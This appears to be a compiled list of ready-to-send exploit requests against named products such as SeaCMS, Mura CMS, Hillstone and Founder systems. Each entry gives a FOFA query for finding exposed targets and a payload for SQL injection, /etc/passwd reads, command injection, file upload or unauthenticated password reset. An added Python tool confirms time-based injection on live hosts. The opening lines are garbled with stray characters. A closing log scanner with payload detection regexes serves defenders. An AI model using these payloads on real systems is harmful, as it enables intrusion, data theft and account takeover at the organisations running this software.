2 x: A# @8 d0 ]! S186. F-logic DataCube3 SQL注入2 Z% ?4 S5 L9 B6 b
CVE-2024-31750
& H% J1 L' G( ZF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统% X" m2 [ ~/ I+ _) f8 V9 @
FOFA:title=="DataCube3"5 ^& b# O% d' y1 c; Z# U- F& L
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
% [: b7 [( O1 KHost: your-ip4 ]: l Q- x7 i G& ^# q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0/ r7 C* a# N2 e' i8 E
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
7 X; x+ h2 g, u8 r8 R, i) _: }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- a( ^+ t9 }, w( e. u, l* rAccept-Encoding: gzip, deflate
o9 O5 n% b- a F; i1 r- @Connection: close: D0 V l, i% P0 j! D# g
Content-Type: application/x-www-form-urlencoded. P, a# }) V# ?9 I; ^- {
. d! g. F, y( ] @
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450! `! y# Y s. [" k6 V+ S) O
7 K7 U+ T. i" u+ o* M7 m! v
% V* s$ _; v2 Y( X% I' {
187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 clinical viewer system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign-trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
The request body is written to disk as an .ashx handler (the extension comes from the name parameter):
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 (Hillstone) 云鉴 security management system setSystemTimeAction command execution
FOFA:body="山石云鉴主机安全管理系统"
Fetch a CSRF token with the same PHPSESSID, substitute it for {{token}} in the second request, then read back the file the command wrote:
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operation management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
The request is unauthenticated; xgh is the account identifier (学工号, student/staff number) and newPass the password it is reset to:
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
The sid value percent-decodes to `ls />/www/aaa.txt` (backtick-quoted), so the command output lands in a web-reachable file; note that the request carries a LuCI sysauth session cookie.
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
This is a post-authentication upload: step 2 logs in with the credentials admin/admin, so it depends on default or weak credentials.

1. Fetch the CSRF token; the login page carries it as csfr:
GET /auth/login?to=/ HTTP/1.1

Response: 200, body contains: csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT from the previous step to obtain a session cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with header:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

3. Upload with the session cookie, then fetch the file:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary.do SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The injection point is TableName, which decodes to: DOM_IMAGE where REFID=-1 union select '1'; WAITFOR DELAY '0:0:5';select DOM_IMAGE from IMG_LARGE_PATH (stacked MSSQL statements passed through the table name).
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

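
Entries 189, 191, 200 and 201 above all rest on a single 5-second WAITFOR DELAY or sleep(5), and one slow response is weak evidence on a busy server. The following is an added example, not part of the original compilation: a Python check that measures a benign baseline, then injects two different delays (3 s and 6 s) and requires each response to be slower by roughly that amount, which separates a real injectable sleep from an endpoint that is merely slow. The request builders follow the shapes of entries 189 and 200; the benign baseline parameter values (id=1, documentUniqueId=1), the timed_http_get transport and the FakeTarget stand-in are assumptions made so that the block runs offline. Check what ac=del does on the target before sending anything to a production system.

```python
"""Confirm a time-based SQL injection by timing, with jitter and slow-server
control. Added example; not part of the original compilation. Request shapes
follow entries 189 (MSSQL WAITFOR DELAY) and 200 (MySQL sleep); FakeTarget is
a constructed offline stand-in for a real HTTP client."""
import re
import statistics
import time
import urllib.request
from typing import Callable, Tuple
from urllib.parse import quote, unquote

Sender = Callable[[str], float]     # issues one request, returns elapsed seconds
Injector = Callable[[int], str]     # delay in seconds -> URL carrying that delay


def timed_http_get(url: str, timeout: float = 30.0) -> float:
    """Real transport: GET `url` and return the elapsed seconds. Errors are
    swallowed on purpose; only the timing matters for this check."""
    start = time.monotonic()
    try:
        urllib.request.urlopen(url, timeout=timeout).read()
    except Exception:
        pass
    return time.monotonic() - start


def confirm_time_based(send: Sender, benign: str, inject: Injector,
                       delays: Tuple[int, ...] = (3, 6), rounds: int = 2,
                       slack: float = 2.0) -> bool:
    """True only if, for every requested delay d and in every round, the
    injected request is slower than the median benign request by between
    0.9*d and d+slack seconds. Asking for two different delays and requiring
    the delta to track them rules out an endpoint that is simply slow."""
    baseline = statistics.median(send(benign) for _ in range(rounds + 1))
    for d in delays:
        for _ in range(rounds):
            delta = send(inject(d)) - baseline
            if not (0.9 * d <= delta <= d + slack):
                return False
    return True


# Builders for two endpoints on this list. The benign request hits the same
# endpoint with an inert value (assumption; confirm what ac=del does first).
def seacms_dmku(base: str) -> Tuple[str, Injector]:
    benign = f"{base}/js/player/dmplayer/dmku/?ac=del&id=1&type=list"

    def inject(d: int) -> str:
        return (f"{base}/js/player/dmplayer/dmku/?ac=del"
                f"&id=(select(0)from(select(sleep({d})))v)&type=list")
    return benign, inject


def lanwon_delete_study(base: str) -> Tuple[str, Injector]:
    benign = f"{base}/xds/deleteStudy.php?documentUniqueId=1"

    def inject(d: int) -> str:
        payload = quote(f"1';WAITFOR DELAY '0:0:{d}'--")
        return f"{base}/xds/deleteStudy.php?documentUniqueId={payload}"
    return benign, inject


class FakeTarget:
    """Constructed offline stand-in for timed_http_get: answers in `latency`
    seconds and, if `vulnerable`, adds whatever delay the payload asked for."""
    DELAY_RE = re.compile(r"sleep\((\d+)\)|waitfor delay '0:0:(\d+)'", re.I)

    def __init__(self, vulnerable: bool, latency: float = 0.3):
        self.vulnerable, self.latency = vulnerable, latency

    def __call__(self, url: str) -> float:
        m = self.DELAY_RE.search(unquote(url))
        extra = int(m.group(1) or m.group(2)) if (m and self.vulnerable) else 0
        return self.latency + extra


if __name__ == "__main__":
    benign, inject = seacms_dmku("http://target.example")
    print("fake vulnerable host:", confirm_time_based(FakeTarget(True), benign, inject))
    print("fake patched host:   ", confirm_time_based(FakeTarget(False), benign, inject))
    # Against a real host: confirm_time_based(timed_http_get, benign, inject)
```

Against a real host, pass timed_http_get as send; one confirmation then costs roughly three baseline requests plus 2×(3+6) seconds of injected delay, which is the price of not acting on a single slow response.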
202. 微擎 AccountEdit.aspx arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
First obtain the __VIEWSTATE and __EVENTVALIDATION values from the page:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Then substitute those two values into the upload request (the bttnUpload value 上传图片, "upload image", is the submit button's caption):
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

203. 红海云 EHR PtFjk.mob file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
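
For defenders, the request shapes in entries 189 to 203 are also log signatures. The following is an added example, not part of the original compilation: a Python scanner for web-server access logs that first canonicalises the request path (collapsing the /js/../ segment from entry 191 and stripping the ;.js path parameter from entry 197, both of which defeat plain string matching), looks it up against the endpoints listed in these entries, and then matches the URL-decoded request line against the payload families used on this page. The SAMPLE_LOG lines are constructed to mirror the entries and the endpoint labels are mine. Only the request line is present in an access log, so POST bodies such as the os.system() call in entry 193 or the multipart filenames in entries 194 and 203 surface only on the endpoint tier unless a WAF or reverse proxy logs bodies.

```python
"""Scan web-server access logs for the Nday request signatures in this list.
Added example, not part of the original compilation. SAMPLE_LOG is
constructed to mirror entries 189, 191, 200, 198 and 197."""
import posixpath
import re
from typing import Iterable, List, Optional
from urllib.parse import unquote, unquote_plus

# Common/combined log format: client, identd, user, [time], "request", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Tier 1: endpoints named in entries 189-203, keyed by normalised path. A hit
# means "investigate": the request may be a scanner probe, not a compromise.
NDAY_ENDPOINTS = {posixpath.normpath(p): label for p, label in {
    "/xds/deleteStudy.php": "189 LANWON deleteStudy.php SQLi",
    "/index.php/admin/Userinfo/poihuoqu": "190 poihuoqu file read",
    "/CDGServer3/NavigationAjax": "191 NavigationAjax SQLi",
    "/JoinfApp/EMail/UploadEmailAttr": "192 UploadEmailAttr upload",
    "/master/ajaxActions/setSystemTimeAction.php": "193 setSystemTimeAction RCE",
    "/servlet/uploadAttachmentServlet": "194 uploadAttachmentServlet upload",
    "/send_order.cgi": "195 send_order.cgi RCE",
    "/cas/userCtl/resetPasswordBySuper": "196 resetPasswordBySuper",
    "/entsoft/Quotegask_editAction.entweb": "197 Quotegask_editAction SQLi",
    "/cgi-bin/luci/admin/services/aliyundrive-webdav/query": "198 CVE-2024-29640",
    "/assetsmanager/upload": "199 cockpit assetsmanager upload",
    "/js/player/dmplayer/dmku/": "200 SeaCMS dmku SQLi",
    "/newsedit/newsplan/task/binary.do": "201 binary.do SQLi",
    "/User/AccountEdit.aspx": "202 AccountEdit.aspx upload",
    "/RedseaPlatform/PtFjk.mob": "203 PtFjk.mob upload",
}.items()}

# Tier 2: payload families used on this page, matched on the decoded request line.
PAYLOAD_PATTERNS = [
    ("time-based SQLi (MSSQL)", re.compile(r"waitfor\s+delay\s+'?\d", re.I)),
    ("time-based SQLi (MySQL)", re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("union-based SQLi", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("command injection", re.compile(r"`[^`]+`|\bos\.system\s*\(|;\s*(uname|id|whoami|cat|ls)\b")),
    ("file:// read", re.compile(r"file:///", re.I)),
    ("dot-segment (../) in request", re.compile(r"/\.\./")),
]


def normalise_path(target: str) -> str:
    """Canonical path for the endpoint lookup. Two tricks on this page defeat
    naive matching: entry 191 reaches NavigationAjax via "/js/../" and entry
    197 appends ";.js" to the servlet path. Drop the query string, drop path
    parameters, percent-decode, then collapse dot-segments."""
    path = target.partition("?")[0].split(";", 1)[0]
    return posixpath.normpath(unquote(path))


def classify_request(method: str, target: str) -> Optional[dict]:
    """Return a finding for one request line, or None if nothing matched."""
    path = normalise_path(target)
    endpoint = NDAY_ENDPOINTS.get(path)
    decoded = unquote_plus(target)          # %27 -> ', + -> space, %60 -> `
    payloads = [name for name, rx in PAYLOAD_PATTERNS if rx.search(decoded)]
    if endpoint is None and not payloads:
        return None
    return {"method": method, "path": path, "endpoint": endpoint, "payloads": payloads,
            "verdict": "payload" if payloads else "endpoint-only"}


def scan(lines: Iterable[str]) -> List[dict]:
    """Run classify_request over access-log lines; unparseable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        finding = classify_request(m["method"], m["target"])
        if finding:
            finding.update(ip=m["ip"], time=m["time"], status=int(m["status"]))
            hits.append(finding)
    return hits


# Constructed sample; the request lines mirror entries 189, 191, 200, 198 and 197.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2024:10:01:03 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 512
203.0.113.7 - - [12/May/2024:10:01:09 +0800] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 87
203.0.113.9 - - [12/May/2024:10:02:41 +0800] "GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1" 200 23
203.0.113.9 - - [12/May/2024:10:03:15 +0800] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 0
198.51.100.4 - - [12/May/2024:10:04:00 +0800] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 500 0
198.51.100.4 - - [12/May/2024:10:05:00 +0800] "GET /index.php HTTP/1.1" 200 4096
"""

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG.splitlines()):
        print(f'{h["time"]} {h["ip"]:<14} {h["verdict"]:<13} {h["endpoint"] or "-"} {h["payloads"]}')
```

Feed it `scan(open("/var/log/nginx/access.log"))` in practice; an endpoint-only hit on a product you actually run is the signal to pull the request body from the application or WAF log, since the access log alone cannot show what was posted.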